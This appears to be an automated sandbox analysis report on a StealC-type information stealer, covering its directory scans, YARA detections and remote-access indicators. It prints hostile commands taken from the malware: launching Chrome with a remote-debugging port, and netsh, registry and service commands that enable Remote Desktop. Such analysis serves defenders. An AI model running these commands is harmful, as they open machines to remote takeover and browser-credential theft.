Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: Yara match File source: 00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR
Source: Yara match File source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C960C40 sqlite3_bind_zeroblob, 17_2_6C960C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C960D60 sqlite3_bind_parameter_name, 17_2_6C960D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C888EA0 sqlite3_clear_bindings, 17_2_6C888EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C960B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 17_2_6C960B40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C886410 bind,WSAGetLastError, 17_2_6C886410
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8860B0 listen,WSAGetLastError, 17_2_6C8860B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C88C030 sqlite3_bind_parameter_count, 17_2_6C88C030
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C88C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 17_2_6C88C050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C886070 PR_Listen, 17_2_6C886070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8122D0 sqlite3_bind_blob, 17_2_6C8122D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8863C0 PR_Bind, 17_2_6C8863C0
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs